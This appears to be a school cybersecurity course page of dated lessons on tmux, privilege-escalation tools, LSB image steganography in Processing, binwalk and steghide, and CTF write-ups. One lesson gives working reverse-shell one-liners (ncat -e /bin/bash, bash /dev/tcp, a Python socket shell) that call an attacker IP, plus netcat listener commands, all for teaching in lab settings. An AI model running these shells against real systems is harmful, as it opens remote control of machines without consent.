To return to the local terminal from Tmux sessions, we usually do detach by hitting Ctrl + b + d. Everything would be still running in the backend. Beware: Using the exit command will actually close your tmux sessions and not the correct way to detach if you want to resume later.

View Sessions

To list all of the Tmux sessions from on the local machine, run one of the following commands.

    $ tmux ls
    $ tmux list-sessions

Kill Sessions

To kill all sessions, from the local terminal, we run the following command.

$ tmux kill-server

To kill specific sessions, from the local terminal, we run the following command.

$ tmux kill-session -t [session-name]

Attach Sessions

To attach to specific sessions, from the local terminal, we run the following command.

$ tmux attach -t [session-name]

Create/Close Windows

In Tmux session, we could have multiple windows. To create a window, in the Tmux terminal, we hit Ctrl + b + c. To kill the current window, in the Tmux terminal, we hit Ctrl + b + &

Select Windows

Each window in the session, regardless of whether it has a name or not (actually its default name is always bash), would have a window id of natural integer 0, 1, etc. We select specific window by hitting Ctrl + b + window id.

Create/Close Panes

Each window in the session could have multiple panes, just like Gnome Terminator. To split the pane vertically, we hit Ctrl + b + %. To split the pane horizontally, we hit Ctrl + b + ". To close the current pane, we we hit Ctrl + b + x.

To toggle between panes in the window, we simply hit Ctrl + b + ARROW_KEY (up/down/left/right)

A reference sheet!

Check out: https://www.shortcutfoo.com/app/dojos/tmux/cheatsheet

Things to try with tmux

Split your window into two panes, left and right
have the right pane open a text editor (nano/vim/emacs). Write a short program, then have the right pane run the code you edited
try sshing

PrivEsc

Vulnerability Databases

NVD (National Vulnerability Database) https://nvd.nist.gov/vuln/search

Exploit-DB: https://www.exploit-db.com/

GTFObins: https://gtfobins.github.io/

How do you check all these explots?!?

You sometimes look up specific versions of specific applications looking for exploits, but if you try to do this with EVERY program on a machine you will go crazy.

Often we enumerate exploits like we enumerate directories. People have written tools to test many exploits:

LinPeas: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS

LinEnum: https://github.com/rebootuser/LinEnum

LES (Linux Exploit Suggester): https://github.com/mzet-/linux-exploit-suggester

Sometimes you cannot use one of the tools because the target machine doesn't have the proper tools installed (python for example is required for some enumaration tools)

linPEAS

You can find the actual script here: https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh but you don't have to get it until you need it.

The linPEAS repo has instructions on running linPEAS.

Looking at https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS you can see this section:

Quick Start.

go back to the top of the page

2026-03-30

2026-03-30T12:00:00+00:00

2026-03-30

Stegonography

If you haven't already done so:

Please install Processing 4.x on your personal devices.

Steganography

Steganography is the practice of hiding a secret message in something that is not secret. Images, text, video, wordProcessor documents and other files can store secret messages, scripts, and other data.

Brainstorm

How could you modify each of the following non-secret things to store a secret message?

Printed text
Digital Text
Image File
Sound/Video files

Text Steganography

There are several categories of text steonography:

format
- feature encoding (e.g. font/shapes/styles of letters)
- line or word shift (e.g. the text is a pixel higher or lower)
- whitespace
linguistic
- switching words for synonyms
- hiding text in the existing word structure
random and statistical

Regarding spaces there are many things that you can alter:

Examples:

Plain text

Consider a message sent in wartime (possibly one that you decrypted with an enigma machine:):

    Apparently neutral’s protest is thoroughly discounted and ignored. Isman hard hit. Blockade
    issue affects pretext for embargo on by-products, ejecting suets and vegetable oils

Look at the 2nd letter of each word:

Pershing sails from NY June I

Printed

Consider some text printed and sent:

Tweet!

How about a tweet? Though it could have been any printed text as well:

Image steganography:

Numbers can be stored in different parts of an image. The least significant bits of each pixel can be changed without changing the percievable image.

go back to the top of the page

Image steganography can be used to hide data inside of different parts of an image, such as the R/G/B/A channels of the pixels, or some combination of those.

Bitwise manipulation in java

You need to know how to examine and change the individual bits of a number.

Bit Shifting

Bitwise OR (|)

This operator is a binary operator, denoted by ‘|’. It returns bit by bit OR of input values, i.e., if either of the bits is 1, it gives 1, else it shows 0.

  0101
| 0111
 ________
  0111  = 7 (In decimal)

a = 5;// 0101 (In Binary)
b = 3;// 0011 (In Binary)
System.out.println(a|b);//will display 7 (0111 in binary).

Bitwise AND (&)

This operator is a binary operator, denoted by ‘&.’ It returns bit by bit AND of input values, i.e., if both bits are 1, it gives 1, else it shows 0.

  0101
& 0111
 ________
  0101  = 5 (In decimal)

a = 5;// 0101 (In Binary)
b = 3;// 0011 (In Binary)
System.out.println(a&b);//will display 1 (0001 in binary).

Bitwise XOR (^)

This operator is a binary operator, denoted by ‘^.’ It returns bit by bit XOR of input values, i.e., if corresponding bits are different, it gives 1, else it shows 0.

I do not plan on going through all of the tools that you will ultimately need to decode things. You will need to learn some google fu to master the world that is around you.

Stegonographic tools:

Audio

Reversed audio - Can be reversed with common audio editing tools such as Audacity
Morse - Long beeps and short beeps, or when in text form dashes and dots. You can use morsecode.world's adaptive decoder to listen via mic or uploaded file for decode. https://morsecode.world/international/decoder/audio-decoder-adaptive.html
Spectrograms - Spectrographic messages often sounds like noise, but displays an image when analyzed with a spectrographical visualizer. https://manual.audacityteam.org/man/spectrogram_view.html
SSTV Often very high pitched sounds with a "fast rythm". Can be converted to still images by using SSTV tools for computer or phones.
1. Windows MMSSTV https://hamsoft.ca/pages/mmsstv.php
2. Linux qsstv http://users.telenet.be/on4qz/qsstv/manual/index.html
3. MacOS - Multiscan 3B https://www.qsl.net/kd6cji/ or Multimode http://www.blackcatsystems.com/software/cw-rtty-sstv-fax-psk31-packet-decoding-software.html

Images

Low contrast (LSB/MSB steganography) - Secrets can sometimes be hidden by lowering the contrast in an image so much that its features becomes indistinguishable to the eye/monitor. Can be examined with most imaging software.
1. stegsolve (run with java -jar Stegsolve.jar) and cycle through different color maps.
Krita https://krita.org/en/
GIMP https://www.gimp.org/

Hidden files - Files or chunks of data can be hidden in images using various tools, I will provide a list of common tools below

steghide Tutorial here: https://linuxhint.com/steghide-beginners-tutorial/
stegoVeritas https://github.com/bannsec/stegoVeritas
outguess https://www.rbcafe.com/software/outguess/
StegoSuite https://stegosuite.org/
F5 https://github.com/matthewgao/F5-steganography

Other

QR codes and other barcodes - See the barcode wiki for examples. Can be decoded by many smart phone apps and online tools.

Hint: http://onlinebarcodereader.com

Text Encoding

Binary - Sequences of 0's and 1's. When used in ARGs it can often be decoded to common charsets such as ASCII, UTF, etc.
Hexadecimal (Base 16) - Strings consisting of letters 0-9 and letters A-F. Can often be decoded in the same way as binary.
Example: 48 65 6c 6c 6f 20 77 6f 72 6c 64 21
Base 32 - Strings consisting of letters 2-7 and uppercase letters A-Z with = as padding.
Example: KRSXG5DJNZTQU===
Base 64 - Strings consisting of upper and lower case letters, numbers, =,+, / and no white space. Can often be decoded to text (like binary above) but also to images, sound, video, etc.
Example: VGVzdGluZwo=
ASCII/Decimal - Strings consisting of numners 0-9 with two or three characters.
Example: 72 101 108 108 111 32 119 111 114 108 100 33
Octal - Strings consisting of numbers 0-7 in groups of three (sometimes two if leading zero is omitted).
Example: 110 145 154 154 157 040 127 157 162 154 144 041
Morse - Strings of dots, dashes and spaces.
Example: .... . .-.. .-.. --- / .-- --- .-. .-.. -.. -.-.--
snow - Whitespace steganography tool http://www.darkside.com.au/snow/

go back to the top of the page

2026-03-31

2026-03-31T12:00:00+00:00

2026-03-31

Pre-Lab: Looking at bits

int x = 7;
println(x&8);
println(x&4);
println(x&2);
println(x&1);

Expected output:

Since we cannot use int's as booleans in java, you can convert to bits with an if, and use that to display the value in binary:

void printBit(int x){
 if(x == 0){
   print(0);
 }else{
   print(1);
 }
}

//print the last 4 digits of a binary number
void printBinary(int x){
  printBit(x&8);
  printBit(x&4);
  printBit(x&2);
  printBit(x&1);
  println();
}

Now we can do soemthing like this:

int x = 7;
printBinary(x);

Expected output:

0111

Of course, you can use the built in functions as well, but what fun is that?

println(Integer.toBinaryString(x));

println(Integer.toString(x,2));//choose any base not just 2.

Expected output: (both of the above are the same)

0111

Notice no leading zeroes.

Changing bits

What does this do to the value of x?

x=7;
x = x & 5;

We know that 5 == 4 + 1 , so you can rewrite this for clarity:

x=7;
x = x & (4+1);
printBinary(x);

Expected output:

0101

Write a function using what you know:

Write a function that returns true when the last three bits of an int are 000.

boolean lastThreeAreZero(int x){}

Write a function that prints all the bits of the integer including leading 0's.

hint: don't manaully type all the powers of 2.

String toBinaryString(int x){}

Classwork/Homework:

Here is the cat you must download:

cat.png

This sketch will open "cat.png"

I will give some class time to allow for questions and fixing of issues if you find it incomprehensible.

Here is an ENCODER template:

Create a sketch called image_encoder and save it in your Classwork Repo at the top level.

Use the processing sketch menu -> Add file, to add cat.png to your sketch.

Run the sketch to generate the input to the decoder.

import java.util.Arrays;

//Note: for code that runs one time place all code in setup.
void setup() {
  size(1200, 600);
  //0. If you want to change the size to display the image you can print the dimensions here:
  //println(img.width,img.height);

  //1. Download cat.png add the to the sketch before running.
  PImage img = loadImage("cat.png");

  //2. Print out the first 30 pixels of the image in the format:
  //(R,G,B):(R2,G2,B2) one per line, where R,G and B are 0-255 in base 10,
  //                       and r2,g2,b2 are binary format of those numbers.

  //3. Write lastThreeAreZero below.

  //4. Print the corresponding 3 true/false for each pixel if any r/g/b end in 000.
  //eg your output should be very close to this format:
  // (0,255,255)    :  (00000000,11111111,11111111) true,  false,  false
  // (255,255,255)  :  (11111111,11111111,11111111) false, false,  false

  //5. Check with others.  There should be 4 color channels in the first 30 pixels with tru turned on.
  //Pixel 0 blue,Pixel 14 red, and Pixel 23 red+green.
}
boolean lastThreeAreZero(int x){
  return false;
}

go back to the top of the page

2026-04-01

2026-04-01T12:00:00+00:00

2026-04-01

Here is the actual ENCODER template:

Create a sketch called image_encoder and save it in your Classwork Repo at the top level.

Use the processing sketch menu -> Add file, to add cat.png to your sketch.

Run the sketch to generate the input to the decoder.

import java.util.Arrays;
int GREEDY = 0;
int SELECTIVE = 1;
int MODE = GREEDY;
//Note: for code that runs one time place all code in setup.
void setup() {
  size(1200, 600);
  //0. If you want to change the size to display the image you can print the dimensions here:
  //println(img.width,img.height);

  //1. Include the cat.png in your Sketch/data/ folder.
  PImage img = loadImage("cat.png");

  //2. Write the MESSAGETOARRAY method
  //convert the string into an array of ints in the range 0-3
  String messageToEncode = "This is a message encoded using LSBSteganography. There are two modes that can be selected. This text is getting longer but is just used to make more pixels different.";
  int[]parts = messageToArray(messageToEncode);

  //3. Write the MODIFY method.
  modifyImage(img, parts);

  //save the modified image to disk.
  img.save("encoded.png");
}

int [] messageToArray(String s) {
  int[]parts = new int[s.length() * 4 + 4 ]; //include the terminating character here.
  //calculate the array


  /**Verify the contents of the array before you do more.
   'T' -> 01010100 -> 01 01 01 00 -> 1, 1, 1, 0
   'h' -> 01101000 -> 01 10 10 00 -> 1, 2, 2, 0
   'i' -> 01101001 -> 01 10 10 01 -> 1, 2, 2, 1
   's' -> 01110011 -> 01 11 00 11 -> 1, 3, 0, 3
   ...etc.
   So your data array would look like this with the terminating character at the end:
   { 1, 1, 1, 0, 1, 2, 2, 0, 1, 2, 2, 1, 1, 3, 0, 3,  ... 3, 3, 3, 3}
   */
  return parts;
}

void modifyImage(PImage img, int[]messageArray) {
  //load the image into an array of pixels.
  img.loadPixels();
  //You can use img.pixels[index] to access this array

  if (MODE == GREEDY) {
    //GREEDY mode : use each pixel in order until you are done with the message.
    //Loop over the pixels in order. For each pixel:
    //-Take the next array value and write it to the red channel of the pixel.
    //-When there are no more letters, write a terminating character.
    //This means 4 pixels will store 1 char value from your String.
    //The terminating character is the value 255.
    //Note: (255 is 11111111b and 11b is just 3, make the last
    //four pixels store {3,3,3,3}
  } else if (MODE == SELECTIVE) {
    //SELECTIVE MODE: only use some of the pixels based on some criteria
    //when the red and green end in 00, modify the last 2 bits of blue with the bit value.
    //e.g.   if the pixel is r = 1100 ,g=1100 and blue=11xy, replace the xy in the blue with the next message value.
    //To terminate the message:
    //when no more message is left to encode, change all the remaining red values that end in 00 to 01.
    //This means the number of pixels that qualify for decoding will be a multiple of 4.
  }

  //write the pixel array back to the image.
  img.updatePixels();
}

To help debug you can print the parts of your letters:

This is the start of the encoded message:

   1 1 1 0 (T 01010100)
   1 2 2 0 (h 01101000)
   1 2 2 1 (i 01101001)
   1 3 0 3 (s 01110011)

So your data array would look like this:

{ 1, 1, 1, 0, 1, 2, 2, 0, 1, 2, 2, 1, 1, 3, 0, 3}

Decoder:

You will additionally create a function that will open encoded.png. It should extract the data using the same mode.

Make sure you extract the same data array that you injected into your image previously.

You are doing this in the same file to maek it easy to compare, later you will be given a different image and the decode must work.

Urgent: You should verify you get the same array values when you decode prior to converting back to a String...

go back to the top of the page

2026-04-13

2026-04-13T12:00:00+00:00

2026-04-13

In your classwork repo, make a folder: image_processing/

Inside this folder you will have 2 sketches:

image_encoder (The sketch template was provided but you must add more.)
image_diff (You will create this later)

You will now be able to use a makefile to run your processing sketches using ARGS

make encode ARGS="whatever"
make decode ARGS="whatever"
make diff ARGS="whatever"

Here is your makefile to be placed in /image_processing/ :

noargs:
	@echo "usage: make encode/decode/diff ARGS=\"various required args\""
decode:
	processing cli --sketch=image_encoder --run -a DECODE $(ARGS)
encode:
	processing cli --sketch=image_encoder --run -a ENCODE $(ARGS)
	cp ./image_encoder/*.png ./image_encoder/data/
diff:
	processing cli --sketch=image_diff --run $(ARGS)

Running remotely:

You can remotely run processing-java in the lab.

Please DO NOT use this on marge/homer/etc. SSH onto a student workstation first!

Use the command xvfb-run before the processing-java command as such:

xvfb-run processing-java --sketch=image_encoder --run -a -DECODE -i encoded32SELECTIVE.png -m SELECTIVE

Make sure you ctrl-c the proess if you don't get your terminal back!

Encoder/Decoder template:


import java.util.Arrays;

//GREEDY/SELECTIVE are exclusive
final static int GREEDY = 0;
final static int SELECTIVE = 1;

//CONTENTS TO BE ENCRYPTED or DECRYPTED:
//FILE/PLAINTEXT are exclusive
final static int FILE = 2;
final static int TEXTONLY = 3;//
//FILE Only works with SELECTIVE

//ENCODE and DECODE are EXCLUSIVE
final static int ENCODE = 4;
final static int DECODE = 5;

int MODE = GREEDY;
int ACTION = ENCODE;
int DATA_TYPE = TEXTONLY;

//default values:
String PLAINTEXT = "This is some text to encode";//for TEXTONLY
String INPUTFILENAME="input.png";// Image to hide things in
String MESSAGEFILENAME="data.dat";// for FILE mode
String OUTPUTFILENAME="encoded.png";
//the parseArgs function will set the above variables to non-defaults


ArrayList<Integer> getParts(PImage img){
  ArrayList<Integer>parts = new ArrayList<Integer>();
  if(MODE == GREEDY){
    //calculate parts here.
    return parts;
  }else if(MODE == SELECTIVE){
    //calculate parts here.
    return parts;
  }

  //error
  println("Error no valid mode");
  return null;
}

//convert the parts arraylist into an array of bytes and return it
byte[] getBytes(ArrayList<Integer> parts) {
  int size = 0;//CALCULATE THE SIZE
  byte[]ans = new byte[size];
  //populate the byte array
  return ans;
}


//print the string that is created from an arraylist of parts
//parts should have: size() % 4 == 0
String decode(ArrayList<Integer>parts){
  String ans = "";
  return ans;
}




void setup()
{
  if(args==null){
    println("no arguments provided");
    println("flags: -a (ENCODE/DECODE) -m MODE (GREEDY/SELECTIVE) -t (PLAINTEXT/FILE) -i INPUTFILENAME -o OUTPUTFILENAME -x MESSAGEFILENAME -p PLAINTEXTMESSAGE");
    return;
  }
  if(!parseArgs()){
    println("Parsing argument error;");
    return;
  }

  //IF DECODE:
  if(ACTION == DECODE){
    PImage img = loadImage(INPUTFILENAME);
    //get the parts from the file
    ArrayList<Integer> parts =  getParts(img);

    //decode it or save it to a file
    if(DATA_TYPE == TEXTONLY){
      println( decode(parts) );
    }else if(DATA_TYPE == FILE) {
      byte[]nums = getBytes(parts);
      println("Saving file: "+OUTPUTFILENAME);
      //built in processing function:
      saveBytes(OUTPUTFILENAME, nums);
    }
  }
  //IF ENCODE:
  if(ACTION == ENCODE){
    //look at DECODE and see how to write this.
    //you should use getBytes, etc.
  }

}

//------------------DO NOT CHANGE THESE FUNCTIONS---------------------
void draw(){
   exit();
}


boolean parseArgs(){
  String debug = "";
  if (args != null) {
    for (int i = 0; i < args.length; i++){
      debug = args[i];
      try{
        if(args[i].equals("-i")){
            INPUTFILENAME=args[i+1];
        }

        if(args[i].equals("-o")){
            OUTPUTFILENAME=args[i+1];
        }

        if(args[i].equals("-x")){
            MESSAGEFILENAME=args[i+1];
        }

        if(args[i].equals("-p")){
            PLAINTEXT=args[i+1];
        }

        if(args[i].equals("-t")){
            String modeString=args[i+1];
            if(modeString.equalsIgnoreCase("FILE")){
                DATA_TYPE = FILE;
            }else if(modeString.equalsIgnoreCase("TEXTONLY")){
                DATA_TYPE = TEXTONLY;
            } else{
              	println("Invalid DATA_TYPE choice, defaulting to TEXTONLY");
              	DATA_TYPE = TEXTONLY;
            }

        }
        if(args[i].equals("-a")){
          String modeString=args[i+1];
          if(modeString.equalsIgnoreCase("ENCODE")){
              ACTION = ENCODE;
          }else if(modeString.equalsIgnoreCase("DECODE")){
              ACTION = DECODE;
          }else{
              println("Invalid MODE choice, defaulting to DECODE");
              ACTION = DECODE;
          }

        }

        if(args[i].equals("-m")){
          String modeString=args[i+1];
          if(modeString.equalsIgnoreCase("greedy")){
              MODE = GREEDY;
          }else if(modeString.equalsIgnoreCase("selective")){
              MODE = SELECTIVE;
          }else{
              println("Invalid MODE choice, defaulting to GREEDY");
              MODE = GREEDY;
          }

        }
      }catch(ArrayIndexOutOfBoundsException e){
        println("Argument flag expected a second part, "+debug+" required mode afterwards.");
        //e.printStackTrace();//for debugging
        exit();
      }
    }
  }
  return true;
}

Testing everything:

Decode in GREEDY + TEXTONLY mode, the message in this image: CatWithMessage.png
Decode in SELECTIVE + TEXTONLY mode, the message in this image (bytes stored = 2447): catTwoSelective.png
Decode in SELECTIVE + TEXTONLY mode, the message in this image (bytes stored = 1625): modifiedCatSELECTIVE.png
Decode in SELECTIVE + FILE mode, the message is a PNG file in this image nested_encoded.png.
DECODE in SELECTIVE + FILE mode, the PNG you decoded above, and extract another PNG.

go back to the top of the page

2026-04-16

2026-04-16T12:00:00+00:00

2026-04-16

image_diff

You are creating a final sketch to show you visually when images are different.

This is easier than the previous sketches, your goal is to give it two png files, and it will do the following:

Visually show the differences between the original and modified images.
Initially it loads the files: cat.png and modifiedCat.png (or the provided arguments filenames with the -o and -m flag.) .
Pressing space will cycle through the modes listed below.

DEFAULT: will display the original image.
DIFF: will display the original image but for every pixel that is different make that pixel PURPLE (red+blue).
DIFF_R: same as DIFF, but only compare the red channel, differences will be red, the same will be white.
DIFF_G: same as DIFF, but only compare the green channel, differences will be green, the same will be white.
DIFF_B: same as DIFF, but only compare the blue channel, differences will be blue, the same will be white.

For all modes, write the name of the mode in the bottom right corner using the text() command, so you know which mode you are in.

import java.util.Arrays;
int DEFAULT = 0;
int DIFF = 1;
int DIFF_R = 2;
int DIFF_G = 3;
int DIFF_B = 4;

int MODE = DEFAULT;

String FILE1="cat.png";
String FILE2="modifiedCat.png";
PImage img1;
PImage img2;


//Your goal:
//Write the command that updates img1 based on the mode
void updateScreen(){
  img1 = loadImage(FILE1);
  img2 = loadImage(FILE2);
  img1.loadPixels();
  img2.loadPixels();


  if(MODE==DEFAULT){
      //default does nothing to the image
      println("DEFAULT");
  }else if(MODE==DIFF){
    println("DIFF");
    //change the image to purple pixels where needed
  }
  img1.updatePixels();
  image(img1,0,0);
}


void settings() {
  if(args==null){
    println("no arguments provided");
    println("flags: -m MODIFIEDFILENAME -o ORIGINALFILENAME");
    return;
  }
  if(!parseArgs()){
    println("Parsing argument error;");
    return;
  }
  println(FILE1);
  println(FILE2);
  img1 = loadImage(FILE1);
  img2 = loadImage(FILE2);
  size(img1.width, img1.height);

}


void setup() {
  updateScreen();
}


void draw(){
    //this is needed for keyPressed
}

void keyPressed(){
  MODE++;
  MODE%=5;
  updateScreen();
}


boolean parseArgs(){
  if (args != null) {
    for (int i = 0; i < args.length; i++){


      if(args[i].equals("-o")){
        if(args[i+1]!=null){
          FILE1=args[i+1];
        }else{
          println("-o requires filename as next argument");
          return false;
        }
      }

      if(args[i].equals("-m")){
        if(args[i+1]!=null){
          FILE2=args[i+1];


        }else{
          println("-m requires filename as next argument");
          return false;
        }
      }
    }
  }
  return true;
}

Testing everything:

Diff these images: cat.png modifiedCatSELECTIVE.png Diff these images: catTwo.png catTwoSelective.png
Diff these images: space.png modifiedSpace.png
go back to the top of the page

2026-04-17

2026-04-17T12:00:00+00:00

2026-04-17

Deadline

Please make sure you complete your image processing lab by monday 8am. This includes all of the encode/decode/diff tools from this week's assignments.

go back to the top of the page

2026-04-20

2026-04-20T12:00:00+00:00

2026-04-20

Reverse Shell and Bind Shell

You know a shell is a command line interface that allows you to run commands.

A Bind Shell session initiated from an attack machine towards a target machine. The target machine listens on a specified port, on which it receives connection from the attacker machine. After the connection is made, the attack machine has a shell on the target machine.

Bind shells don't always work for you because you have to get past a firewall to access a target machine.

A Reverse Shell is a session that initiates from a remote machine i.e. target host to the attacker machine. The attack machine listens on a specified port. After the connection is made, the attack machine has a shell on the target machine.

A reverse shell will allow the target machine to bypass the firewall for you!

Netcat

Netcat is a Command-line Interface (CLI) tool that is use to read/write data over TCP/UDP.

It is a Back-End tool which can be cross utilized by other programs (can connect to it with many other applications).

Documentation states that Netcat can be used for:

It can allow other programs to establish connections etc.
Outbound/Inbound (TCP + UDP) connections
Any source port can be used by netcat
Can use any configured source network address (locally).
Port Scanning
It can read CLI arguments from STDIN
Slow transmitting mode
Hex-dump of any communication.

Netcat's 1st feature is the one we care about for today's activity.

Instalation

Linux:

sudo apt-get install netcat

Mac:

brew install netcat

Windows:

You can find a binary here: https://joncraton.org/blog/46/netcat-for-windows/

What are we doing?

Listen for connections on the attack box.
Find a way to perform Remote Code Execution (RCE),
The RCE should trigger the reverse shell.
Now you have access from your attack box to the target machine!

To listen: Netcat is easy to use and cross platform so we will try to use it to listen for a connection on the attack machine.

To connect back: The program that initiates the connection can vary (python, bash , ncat, perl, php, etc.)

Reverse shell

There are three steps in setting up a reverse shell:

Set Up a Netcat listener on the attacking machine.
```
nc -lvp PORT_NUMBER
```
(all versions of netcat can do this)
Connect back to Netcat listener from target machine using some script. (requires some form of remote code execution)
Type commands on attacking machine to send them to the target through the Netcat shell session.

Let us take a look at how to install a netcat reverse shell on various machines and how it can be used. Netcat is used in daily life of an ethical hacker and how we can get reverse shell through it. We then discussed edge case scenarios where a red teamer or an ethical hacker cannot get access to a Netcat binary.

All methods require a server on your attack box:

All methods require a listening server on the attack box. This can be EITHER version of netcat.

netcat (nc or ncat) can be used to create a listening server for a reverse shell.

You have to forward the port to your attack box if you are behind a router

Open a shell, and run a server on a specific port here I chose 9001 for testing:

nc -lvp 9001

-l for listen mode, for inbound connects
-v for verbose
-p [port] for specifying port number

Test your server

Test by using a simple networking connection tool like telnet. You can telnet ATTACKBOX PORT e.g. If your machine is cslab4-23, and you have netcat listening on port 9999 then telnet from any other machine as follows: telnet 149.89.161.123 9999

Reverse Shell Method 1. Using netcat on the target machine:

Run a command on the target box:

To connect your target box to your attack box you execute the following command. This could be via a script or non-interactive shell.

ncat ATTACKER_IP PORT -e /bin/bash

ncat 192.168.100.113 9001 -e /bin/bash

You are connected!

Now you can type commands on the attack box and have them run on the target machine! Be aware that you only have the same permissions as the account that is logged into the target machine.

This may fail to work with -e because the versions have different features.

Pros/Cons

This is a simple and effective way to get a reverse shell started. One major downside is that you need Netcat on the target host which is very often not the case in real world scenario. In some cases Netcat is present, or we have a way to install it, but in many cases we need to use alternatives ways to connect back to the attack box.

Let's have a look at a few alternative ways to setup a reverse shell.

Method 2: bash on the target machine

You can connect bash to you netcat server. Since bash is usually present, this is more flexible than connecting with netcat.

Again run a server on the attak machine:

nc -lvp 9001

With can now use Bash to initiate a reverse shell from the target host to the attack box by using the following command: (note you cannot do this from zsh, run bash as your shell first)

bash -i >& /dev/tcp/ATTACKER_ADDRESS/PORT 0>&1

bash -i >& /dev/tcp/149.89.161.101/9001 0>&1

Method3: python on the target machine

You can connect using a python script too!

Again run a server on the attak machine:

nc -lvp 9001

On the target machine run the python script:

Please edit the script with the correct IP address OR shell variable.

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("149.89.161.100",9999));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Note the IP and port inside the s.connect(("149.89.161.100",9999))

The script so you can read it more easily

    import socket,subprocess,os;
    s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
    s.connect(("149.89.161.100",9999));
    os.dup2(s.fileno(),0);
    os.dup2(s.fileno(),1);
    os.dup2(s.fileno(),2);

Errors don't go to the attack box (STDERR)

Several other things that you will notice as you use it

Try it on tryhackme

If you want to try it on tryhackme, it is easier to use the attack box.

When you use VPN to access tryhackme you can still get this working. However, you should experiment to make sur eyou can connect to your personal device.

Places to find reverse shells:

https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

https://highon.coffee/blog/reverse-shell-cheat-sheet/#python-reverse-shell

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md

Netcat cheat sheet:

https://www.varonis.com/blog/netcat-commands/

General Problems:

This reverse shell isn't as flexible as a normal bash shell:

no tab completion
ctrl-C will close the whole shell.
Errors don't go to the attack box (STDERR)
Several other things that you will notice as you use it

Try it on tryhackme

If you want to try it on tryhackme, it is easier to use the attack box.

When you use VPN to access tryhackme you can still get this working. However, you should experiment to make sur eyou can connect to your personal device.

go back to the top of the page

2026-04-21

2026-04-21T12:00:00+00:00

2026-04-21

TryHackMe challenges and Writeups

You were assigned a new module with three rooms.

Deadline: Tues April 28th

You are working on this in class and at home every day until you are done. If you don't work at home each day then you are not doing your homework.

The goal of these rooms is to:

Demonstrate that you learned the material in the prior rooms
Communicate complex processes to other technical users (writing tutorials)
Learn a few more tools while you are doing this.

You will have three new md files in your classwork repo.

You will give meaningful commit messages as you complete various tasks and update your readme.

You will commit for each new discreet task, explaining what you did / how you did it. If you commit once per session, you will get very large deductions in credit.

go back to the top of the page

2026-04-22

2026-04-22T12:00:00+00:00

2026-04-22

CTF Writeup

The number one way to lose points on this project is to do a minimal job, and include "explanations" like "Google a hex to string calculator and use it to convert this." If you use an online tool to help you quickly solve the problem, consider some possible things you can do to explain in a way that will actually help someone learn something.

Explain how to use built in tools to solve the problem. e.g. any built in tools md5sum etc.
Explain how to solve the problem analytically and that the tool just does that really fast. E.g. a ceasar shift, or strange number base conversion.

Your ultimate goal: make your MD file informative, someone should learn things from reading through it.

Markdown

You will have a portion of your grade be your markdown.

A secondary goal is to use markdown tags to make it more readable and demonstrate that you understand markdown.

Lists, Bold, Italics, code blocks, tables, headers and similar things will make the page more readable. If your document is a wall of plain text with a few bold things that is not sufficient.

Some more tools for your CTF

Exif Data

Exif is a standard for storing metadata in images. You can actually look at the head of the file with a text editor, xxd or even cat since it is usually plain text.

You can view exif data in most operating systems by viewing the image properties. Right click the file and read the info!

There is also a convinient exif command on the terminal.

Finally there are other tools to do this, including web tools: https://exifdata.com/

Steganography

For the following three programs, there are directories in your cyber_resources you can find a steghide, and binwalk directory with some files to test out. Try to decode those files before working on your CTF+Challenges

Stegsolve

https://wiki.bi0s.in/steganography/stegsolve/

In the lab, you can invoke stegsolve directly using:

java -jar ~/Documents/cyber_resources/stegsolve/stegsolve.jar

The official download seems to be: http://www.caesum.com/handbook/Stegsolve.jar

Since this is a java program it works on any system.

You can test stegsolve on ~/Documents/cyber_resources/stegsolve/mountain.png

Steghide

The lab has steghide installed. You can install it on your personal device as well:

https://wiki.bi0s.in/steganography/steghide/

For windows: http://steghide.sourceforge.net/download.php

Note: The password field when using steghide is optional, but it will always ask for the password.

Binwalk

Binwalk is a tool for explore a given binary image for embedded files and executable code. Specifically, it's designed for identifying files and code embedded inside firmware images.

Binwalk is a useful tool that you should learn to use when trying to separte parts of a file. It can do so many other things, but I am just showing you the documentation (man pages).

You can man binwalk to see how it works but some examples could be helpful:

Examples of the extract command:

Extract any files from the input file:

binwalk --dd=".*" INPUT_FILE_NAME

More complex:

-D : Extracts files identified during a --signature scan. Multiple --dd options may be specified.

-D 'type[:ext[:cmd]]'

type is a *lower case* string contained in the signature description (regular expressions are supported)
ext is the file extension to use when saving the data disk (default none)
cmd is an optional command to execute after the data has been saved to disk

Extract all png files from a file:

binwalk -D 'png image:png' INPUT_FILE_NAME

Extract and run another program (in this case Unzip):

The following example demonstrates specifying an extraction rule using the --dd option that will extract any signature that contains the string 'zip archive' with a file extension of 'zip', and subsequently execute the 'unzip' command.

binwalk -D 'zip archive:zip:unzip %e' firmware.bin

Same as before, but additionally, PNG images are extracted as-is with a 'png' file extension.

binwalk -D 'zip archive:zip:unzip %e' -D 'png image:png' firmware.bin

Note the use of the '%e' placeholder. This placeholder will be replaced with the relative path to the extracted file when the unzip command is executed:

Try it Now:

In your cyber_resources you can find a steghide, and binwalk directory with some files to test out.

If you get a permission denied error you may have to copy the image/file to your home directory before you try to perform operations

Or try to extract data from the following two files. When you do this with -D , binwalk creates a directory. You can open the contents yourself... based on the data type.

Download the file: cat

Download the file: cat2

go back to the top of the page

2026-04-24

2026-04-24T12:00:00+00:00

2026-04-24

Comparing Files:

DO IT: copy both win.txt and lin.txt to your home directory somewhere

DO IT: Make both files (win.txt and lin.txt) executeable using the chmod command

chmod u+x FILENAME

DO IT: Run the commands: ./win.txt and ./lin.txt and compare the results.

xxd hex with metadata:

You should remember the xxd command:

xxd input_file

This shows the hex values AND the plain text along side. Great for previewing the information while looking at the hex values. This is not ideal if you want to edit the results however.

xxd to plain hex with no metadata:

xxd -p input_file

This ONLY shows the hex values, and makes it easier to modify if you know which parts you are trying to edit.

You can redirect this to another file so you can save it!

STOP AND DO IT!

DO IT: View lin.txt and win.txt as hex. What is the difference?

Hexdump back into a binary file

You can use xxd to get the plain text hex back to binary

Revert a plaintext hexdump back into binary, and save it into a file:

xxd -r -p input_file output_file

or:

